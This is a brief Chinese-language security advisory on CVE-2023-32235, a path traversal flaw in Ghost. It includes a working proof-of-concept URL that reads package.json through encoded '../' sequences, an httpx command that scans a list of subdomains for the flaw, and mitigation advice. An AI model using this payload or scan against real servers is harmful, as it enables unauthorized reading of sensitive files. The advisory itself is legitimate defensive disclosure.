Ghost应用程序存在路径遍历漏洞,编号为CVE-2023-32235。此漏洞允许攻击者通过操纵"package.json"文件路径来访问指定目录之外的敏感文件。
以下概念验证演示了路径遍历漏洞: {{base-uri}}/assets/built%2F..%2F..%2F/package.json
httpx工具执行以下命令测试漏洞:
httpx -l subs.txt -path "/assets/built%2F..%2F..%2F/package.json" -status-code -mc 200成功利用此漏洞可导致未授权访问目标服务器上的敏感文件。这可能泄露机密信息,损害用户隐私,并削弱受影响应用的安全性。
为缓解此漏洞,建议在处理文件路径时实施严格的输入验证并对用户提供的数据进行净化。开发者应避免直接接受用户输入作为文件路径,而应使用安全的替代方案,如白名单可接受的路径或使用安全库。